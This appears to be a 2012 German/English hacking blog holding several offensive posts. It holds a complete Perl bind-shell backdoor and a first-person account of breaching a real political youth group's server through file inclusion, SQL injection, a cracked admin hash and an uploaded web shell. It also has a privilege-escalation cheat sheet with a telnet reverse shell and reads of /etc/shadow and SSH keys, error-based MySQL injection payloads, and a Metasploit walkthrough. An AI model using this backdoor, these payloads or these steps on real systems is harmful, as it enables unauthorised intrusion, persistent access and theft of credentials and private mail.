learn online with video tutorials…

Posted in Uncategorized on April 24, 2012 by peak

IT hardware basics:

IT network basics:

IT security basics:

Windows basics:

Mathematics & Physics:

Learn Programming in c,obj-c,c++,c#,java

Perl Backdoor with pty

Posted in r00ting on April 17, 2012 by peak

# Advanced perl backdoor
use warnings;
use strict;
use IO::Socket;
use IO::Select;
use POSIX;

my $PORT = 18082;
# perl -e ‚$pass=“yourpassword“; print crypt($pass,substr($pass,2)).“n“‚
my $PASSWORD = ‚pawQj8NmTbBGI‘;
my $SHELL = „/bin/sh“;
my $HOME = „/tmp“;
my $PROC = „/bin/sh“;
my $PROMPT = „P-> „;
my @STTY = (’sane‘, ‚echoe‘, ‚echoctl‘, ‚echoke‘, ‚-ixany‘);

$ENV{PS1} = ‚\u@\h:\w\$ ‚;
$ENV{PATH} = ‚/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/ucb‘;
$ENV{HISTFILE} = ‚/dev/null‘;
$ENV{USER} = ‚root‘;
$ENV{LOGNAME} = ‚root‘;
$ENV{LS_OPTIONS} = ‚ –color=auto -F -b -T 0‘;
$ENV{LS_COLORS} = ‚LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:‘;
$ENV{TERM} = ‚xterm‘;

$0 = $PROC.““;

$SIG{CHLD} = sub { wait; };


safeload(’sys/ttycom.ph‘, 1);
safeload(’sys/ioctl.ph‘, 1);
safeload(‚asm/ioctls.ph‘, 1);

foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined());
# linux
if (open(IOD, „< /usr/include/asm/ioctls.h")) {
while() {
#if (/^#defines+$IOCTLs+(.*?)n$/) {
if (/^#define\s+$IOCTL\s+(.*?)\n$/) {
eval „sub $IOCTL () {$1;}“;
eval „sub $IOCTL () { $IOCTLDEF{$IOCTL};}“ unless (defined());

$PORT = $ARGV[0] if ($ARGV[0]);

my $bind = IO::Socket::INET->new(Listen=>1, LocalPort=>$PORT, Proto=>“tcp“) or die „$!“;

defined(my $pid = fork)
or die „$!“;
exit if $pid;

my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();

while (1) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);

sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));

sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));

sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
do_client($newcon, ‚3‘, ‚5‘, ‚1‘);
write_client($newcon, $PROMPT) if ($PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
} else {
telnet_parse($fh, $msg);

sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split(“, $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /r|n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = “;
$pass =~ s/n//g;
$pass =~ s/0//g;
$pass =~ s/r//g;
if (crypt($pass, $PASSWORD) ne $PASSWORD) {
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, „\r\n\r“);
$msg =~ s/rn00//g;
$msg =~ s/0//g;
$msg =~ s/rn/n/g;
write_shell($cli, $msg);

sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
unless (defined $nread) {
} else {
write_client($cli, $msg);

sub to_chr {
my $chrs = “;
map { $chrs .= chr($_) } (split(/ +/, shift));

sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;

sub chr_parse {
my ($client, $chrs) = @_;
my $ords = “;
map { $ords .= ord($_).‘ ‚ } (split(//, $chrs));
my $msg = “;

if ($ords =~ /255 250 31 (d+) (d+) (d+) (d+)/) {
my $winsize = pack(‚C4‘, $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# or die „$!“;

foreach my $code (split(„255 „, $ords)) {
if ($code =~ /(d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
write_client($client, $msg) if ($msg);

sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, „ERROR: No more pty’s avaliable\n“);
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, „ERROR: fork()\n“);
unless($pid) {
if (open (DEVTTY, „/dev/tty“)) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# or die „$!“;
ioctl($tty, &TIOCSCTTY, 0);# or die „$!“;

open (STDIN, „&“.fileno($tty)) or die „$!“;
open (STDERR, „>&“.fileno($tty)) or die „$!“;
foreach my $stty („/bin/stty“, „/usr/bin/stty“) {
next unless (-x $stty);
map { system(„$stty“, $_) } @STTY;

{ exec(„$SHELL“) };
while (my $msg = ) {
$msg =~ s/n$//;
$msg =~ s/r$//;
system(„$msg 2>&1“);
select($pty); $|++;
$CLIENT{$cli}->{shell} = $pty;

sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
return undef;
unless ($termios->getattr($ttyno)) {
return undef;
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
return undef;
return 1;

sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{„pty.$cli“}, *{„tty.$cli“});
for (my $i=0; $i $pty“));
my $tty = get_tty($i, „/dev/tty“);
unless(open($TTY, „+> $tty“)) {
return($TTY, $PTY);

sub get_tty {
my ($num, $base) = @_;
my @series = (‚p‘ .. ‚z‘, ‚a‘ .. ‚e‘);
my @subs = (‚0‘ .. ‚9‘, ‚a‘ .. ‚f‘);
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];

sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::///g;
if ($require) {
map { eval („require \“$_/$file\“;“) if(-f „$_/$file“); } @INC;
} else {
$file .= „.pm“ unless ($file =~ /(.pm|.ph)$/);
return(eval(„use $module $arg;“)) if (grep { -f „$_/$file“ } @INC);

sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless($shell);
foreach my $m (split_chars($msg, 20)) {
print $shell $m;

sub split_chars {
no warnings;
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split (“, $msg);
my $done = 0;
while (1) {
my $splited = join(“, @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) {sock};

if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sock->close() if($sock);

sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);

post exploitation pty shell

Posted in r00ting on März 5, 2012 by peak


python -c 'import pty; pty.spawn("/bin/bash");'


# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh

sh-3.2$ expect sh.exp

Hacking jusos aus dem Saarland

Posted in PHP Injection on Februar 15, 2012 by peak

Ich werde mich stichwortartig kurz halten wie ich vorgegangen bin.

1. Safe Mod Restriction erkannt
2. restriction bis zum /var/www/web53/html/ ordner
3. trotzdem log files getestet um sicher zu sein, sowie einige config files oder sessions -> fehlanzeige
4. php input wrapper probiert
5. php base64 filter erfolgreich auf die index.php
6. base64 code decoded, index source gelesen -> db_oeffnen.inc.php gefunden
7. db_oeffnen.inc.php wieder included und wieder base64 code decodiert
8. das hier gefunden:


9. nmap scan des Servers -> 3306/tcp open mysql
10. versucht mit mysql client auf den server zu verbinden -> fehlanzeige
11. selbiges über ssh versucht
12. sqli lücke auf der seite gesucht und nach 10s gefunden
13. über mysql lücke outfile machen wollen aber mysql quotes sind enabled also funktioniert das auch nicht
14. user registriert, konnte nicht aktiviert werden
15. sqli admin table etc auslesen
16. admin md5 hash mit bekannten online md5 cracker herausgefunden
16. admin login suchen und mich nicht austricken lassen /admin/ -> fail, /admin/login.php
17. admin bereich nach upload möglichkeiten gesucht
18. nach ein paar versuchen gemerkt das das panel so verbugt ist das es wieder sicher ist,
19. mein registrierter user aktiviert und im user panel nach upload möglichkeit gesucht, nix gefunden
20. source code über die lfi angeschaut und den Fehler gesucht
21. gemerkt das es am safe mode liegt
22. phpmyadmin gesucht
23. phpmyadmin.jusos-saar.de hosting panel gefunden
24. login aus der source genommen. -> funktioniert.
25. bissl rumschnuppern …
26. webFTP, shell hochgeladen
27. erkannt das 10 domanis auf dem server sind, sowie zugriff auf alle mails der örtiegn usos und ftp und und und und …
28. Januar 2012 Monthly Totals Visits:10158 Hits: 199200
29. passwort in diesem Beitrag zensiert
30. neue email adresse erstellt
31. über webMail den admin sowie das Büro informiert

Basic Linux Privilege Escalation

Posted in r00ting on Januar 31, 2012 by peak

following article is from g0tmi1k! I don’t take any credits. Visit his Blog: http://g0tmi1k

Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a „magic“ answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more „things“ to look for. It’s just a basic & rough guide. Not every command will work for each system as Linux varies so much. „It“ will not jump off the screen – you’ve to hunt for that „little thing“ as „the devil is in the detail“.

Enumeration is the key.
(Linux) privilege escalation is all about:

Collect – Enumeration, more enumeration and some more enumeration.
Process – Sort through data, analyse and prioritisation.
Search – Know what to search for and where to find the exploit code.
Adapt – Customize the exploit, so it fits. Not every exploit work for every system „out of the box“.
Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable – it’s worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‚$1 ~ /^.*r.*/

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 „password“ [filename]
find . -name „*.php“ -print0 | xargs -0 grep -i -n „var $password“   # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig –list
chkconfig –list | grep 3:on

Whats cached? IP and/or MAC addresses
arp -e
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 80 and tcp dst 21

Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080: root@    # Local Port
ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
cat /etc/passwd | cut -d:    # List of users
grep -v -E „^#“ /etc/passwd | awk -F: ‚$3 == 0 { print $1}‘   # List of super users
awk -F: ‚($3 == „0“) {print}‘ /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything „interesting“ in the home directorie(s)? If it’s possible to access
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk ‚$1 ~ /^.*w.*/‘ 2>/dev/null     # Anyone
ls -aRl /etc/ | awk ‚$1 ~ /^..w/‘ 2>/dev/null        # Owner
ls -aRl /etc/ | awk ‚$1 ~ /^…..w/‘ 2>/dev/null    # Group
ls -aRl /etc/ | awk ‚$1 ~ /w.$/‘ 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with „Local File Includes“!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, you break out of the „jail“ shell?
python -c ‚import pty;pty.spawn(„/bin/bash“)‘
echo os.system(‚/bin/bash‘)
/bin/sh -i

How are file-systems mounted?
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What „Advanced Linux File Permissions“ are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r „bin$“`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in ‚common‘ places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‚common‘ places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any „problem“ files? Word-writeable, „nobody“ files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code

Finding more information regarding the exploit

(Quick) „Common“ exploits. Warning. Pre-compiled binaries files. Use at your own risk

Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

Other (quick) guides & Links


Klicke, um auf stackjacking-infiltrate11.pdf zuzugreifen

Klicke, um auf post_exploitation_fall09.pdf zuzugreifen


rooting Samsung Galaxy Note (GT-N7000)

Posted in Android on Januar 23, 2012 by peak

1. Get Stock ROM from Samsung that is rootable & odin


the zergRush Exploit should work with every model <= KL3, so get that Image e.g I’m working with KKA. Next Get Odin to flash stock roms (dont flash custom rom, it will increase an inner counter)


2. Downgrade your Galaxy Notewith odin  to that rootable stock Rom you just downloaded

Make sure USB Debbuging is enabled. Include your rom in „pda“. It’s simple ..

3. Download drivers and the zergRush Exploit


password: samfirmware.com


4. root your device

Make sure USB Debbuging is enabled.

Connect your phone with your computer (it should get acknowledged!)

Make sure your USB Memory is connected (swipe down the menu and tap on the connect usb)

run the zerg exploit (simple, check the zip file. I’m using DooMLoRD_v4_ROOT-zergRush)

5. install manually ClockworkMod Recovery (you need it to flash custom roms

Download http://downloadandroidrom.com/file/GalaxyNote/recovery/GalaxyNoteRecovery.zip

now swap to your shell/cmd (i’m on win7 atm.)

cd \GalaxyNoteRecovery

adb devices

adb push KKA\zImage /data/local/zImage

adb shell

dd if=/data/local/zImage of=/dev/block/mmcblk0p5 bs=4096
rm /data/local/zImage

6. Congratz! You are root, now lets update to newest StockRom

You can do that wth mobile odin pro.apk or with the just installed CWM Recovery.

Download MobileOdin Pro and your uptodate Stock Rom (extract it) and copy both, the .apk and the .md5 file, in the root directory of your phone (disable usb debugging for this and use windows explorer). It is also possible hat you have 3 files instead of .md5!
Now Keep the everroot option enabled. flash. done.

Copy your rom on root (.md5 files or more). Open CWM and „Flash Stock Firmware“ if you just got md5 always take that when asked. And when asked choose „Keep CF-Root Kernel“. Done.

Some Exotic MySQL Magic

Posted in SQL Injection on Januar 21, 2012 by peak

MySQL Columns/Tables herausfinden in v4.x mit error report on


MySQL answer:
“Operand should contain 7 column(s)”

‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)– –

MySQL answer:
“Column ‘usr_u_id’ cannot be null”

SELECT id, name, pass FROM users WHERE id = 1 PROCEDURE ANALYSE()

you have to see the first column output: testdb.users.id

MySQL Error based SQL Injection

select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

/?param=and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)–

/?param=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)–

Log Files Sorted by OS

Posted in PHP Injection on Januar 14, 2012 by peak

Jedes OS hat seinen eigenen typischen LogFiles und Config Files. Natürlich könnten diese auch vom Admin angepasst werden. Im laufe der Zeit werde ich weitere Paths hinzufügen.



/etc/issue.net <- Version



0wning Metasploitable

Posted in r00ting with tags , on Januar 13, 2012 by peak

Metasploit Framework Einführung – Owning Metasploitable

Das sind ein paar Notizen von mir. Dieses Tutorial sollte eine Einführung in das Metasploitframework werden.
Es gibt im Netz, und vorallem auf youtube, dutzende Tutorials/Guides/HowTo’s. Ich werde euch nun meine Variante vorstellen.

Ich empfehle euch das ganze als Testumgebung in VmWare laufenzulassen.
Installiert dafür den kostenlosen VmWare Player

Als nächstes ladet euch noch eine BackTrack 4 VMware Image herunter. Darauf werden wir arbeiten.

Und Metasploitable. Das ist ein Ubuntu Server mit vielen eingerichteten Vulns um das msf zu testen.

Starten nun beide VmWares und wechselt zur BackTrack4 vm.

BT4 Login root:toor

Startet nur als erstes das UI mit startx und stellt das Keyboardlayout unter Settings/Regional & Accessibility/Keyboard Layout entsprechend anpassen.

So wir starten nun das Netzwerkinterface, weil bt4 das nicht automatisch macht.
/etc/init.d/networking start
check mit ifconfig
Lasst uns nun zuerst bt4 updaten

apt-get update
apt-get upgrade
apt-get dist-upgrade

und updated msf

cd /pentest/exploits/framework3
svn update

ok, bt4 ready to rock.

Scanne LAN nach Hosts

root@bt:~# nmap -sP

Nmap scan report for
Host is up (0.00067s latency).
MAC Address: 00:0C:29:0B:88:85 (VMware)

Ihr erhaltet eine Liste aktiver Hosts. Nmap identifiziert die Mac automatisch als VmWare. In meinem Fall hat der Server die ip

Mit nmap werden wir testen welche Ports auf dem Server offen sind. Ausserdem wird nmap versuchen das OS (-O) und genauere Informationen zum Service hinter einem offenem Port (-sV) herauszufinden.

root@bt:~# nmap -sV -O

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-03-15 20:40 EDT
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 988 closed ports
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:0B:88:85 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.01 seconds

Wir wissen nun das wir es mit einem Linux Webserver zu tun haben.
Mit Apache Tomcat/MySQl kenne ich mich am besten aus darum werde ich mir den als erstes Anschauen.

Dafür gleicheinmal einen kurzen Check. Mit nc mache ich eine schnelle Get Abfrage. (Natürlich kann man genausogut Firefox starten und [url][/url] als url eingeben)
nc 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request

Offensichtlich liegt jedoch keine Website im wwwsrc folder. Um sich aber sicher zu sein sollte man wenigstens mit einem Fuzzer darüber.

Das Tool dafür heisst DirBuster.

cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u

Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 200
Dir found: /doc/ - 403
Dir found: /twiki/ - 200
File found: /twiki/readme.txt - 200
File found: /twiki/license.txt - 200
File found: /twiki/TWikiDocumentation.html - 200
Dir found: /twiki/bin/ - 403

Bingo -> Wenn wir nun auf [url][/url] gehen kommen wir schliesslich über getStarted auf [url][/url] und das ist offensichtlich ein CMS. Wir könnten jetzt auf exploit-db nach einer bereits bekannten Vuln suchen, abe hier soll es ja um das msf gehen starten wir nun msfconsole.

cd /pentest/exploit/framework3

Help ruf die Hilfe auf. Show Exploits zeigt uns alle Exploits an und Search durchsucht das msf nach meinem String, z.B. tikiwiki.

msf > search tikiwiki

Wir sehen nun Auxiliary und Exploit Module. Auxiliary sind Sniffing, Fuzzing, scanning Module die hauptsächlich Informationen liefern. Solche Module werden keine Shell starten. Exploits hingegen können aktiv sein und eine shell spawnen (service orintierter exploit) oder passiv sein und auf eingehende client connections warten (client orientierter exploit -> web browsers, ftp client, etc.)

Ich verwende den PHP Code Executer:

use exploit/unix/webapp/tikiwiki_graph_formula_exec

Mit Info können wir nun genauere Informationen und eine Erklärung zum Exploit sehen.

Wir müssen nun als nächstes gewisse Parameter für den Exploit einstellen. Mit Show Options werden diese angezeigt.

Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        Use a proxy chain
RHOST                     yes       The target address
RPORT    80               yes       The target port
URI      /tikiwiki        yes       TikiWiki directory path
VHOST                     no        HTTP server virtual host

Alle Optionen die Required sind müssen gesetzt werden. Das machen wir folgendermassen:

sf exploit(tikiwiki_graph_formula_exec) > set RHOST

Nun haben wir den Exploit startbereit doch was soll er machen? Dafür ist der sogenannte payload zuständig. Mit show payloads können wir alle kompatible payloads sehen.
Ich will eine php shell spawnen, deshalb verwende ich die php bind_shell

set payload php/bind_php

Wir geben nun wieder show options ein und sehen nun das wir auch Parameter für den payload verwenden können. Ich ändere z.B. den Port nach meinen Wünschen.

set lport 55555

So der Exlpoit ist nun bereit.

msf exploit(tikiwiki_graph_formula_exec) > check
[+] The target is vulnerable.
msf exploit(tikiwiki_graph_formula_exec) > exploit

[*] Started bind handler
[*] Attempting to obtain database credentials...
[*] The server returned            : 200 OK
[*] Server version                 : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
